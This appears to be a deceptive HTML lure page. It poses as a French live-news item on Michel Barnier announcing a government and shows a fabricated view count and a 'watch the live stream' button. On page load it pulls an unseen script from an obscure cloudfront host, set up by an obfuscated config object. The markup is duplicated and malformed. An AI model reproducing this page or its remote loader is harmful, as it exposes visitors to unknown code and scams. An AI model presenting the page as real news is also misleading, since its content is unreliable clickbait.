<!DOCTYPE html>
<html lang="en">
<head>
  <!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>michel barnier</title>
    <meta thhp-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
    <meta name="new" content="width=device-width, initial-scale=1.0">


</head>



<body>
    <script type="text/javascript">
        var vkTqG_jFk_ArnZqc={"it":4363513,"key":"7c3ff"};
    </script>
    <script src="https://d1dvnx7eh6slvq.cloudfront.net/e757750.js"></script>
    
 

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>michel barnier</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            background-color: #f4f4f4;
            margin: 0;
            padding: 0;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
        }
        .container {
            background-color: #fff;
            padding: 100px;
            box-shadow: 0 0 100px rgba(0, 0, 0, 0.1);
            border-radius: 10px;
            max-width: 800px;
            text-align: center;
        }
        .zip-icon {
            font-size: 100px;
            margin-bottom: 20px;
        }
        .download-btn {
            background-color: #4CAF50;
            color: white;
            padding: 15px 25px;
            text-align: center;
            text-decoration: none;
            display: inline-block;
            font-size: 16px;
            margin-top: 20px;
            border-radius: 5px;
            cursor: pointer;
            border: none;
        }
        .download-btn:hover {
            background-color: #45a049;
        }
        .views {
            font-size: 14px;
            color: #888;
            margin-top: 10px;
        }
        .about-file {
            margin-top: 20px;
            color: #555;
        }
        img {
            max-width: 100%;
            border-radius: 10px;
            margin-bottom: 20px;
        }
    </style>
</head>
<body>

<div class="container">
    <img src="https://i.ibb.co/ZKDVYRQ/d0030a6-5612380-01-06.jpg" alt="d0030a6-5612380-01-06" border="0"></a>
    <div class="zip-icon"></div>
    <h2>En direct, Michel Barnier : « La semaine prochaine, on nommera un gouvernement », assure le premier ministre
Michel Barnier s’est exprimé mercredi à Reims lors des journées parlementaires d’Horizons, le parti d’Edouard Philippe.</h2>
    <p class="views">130K views</p>
    <button class="download-btn" onclick="_VU()">Regardez la diffusion en direct</button>
    <div class="about-file">
    </div>
</div>

</body>
</html>
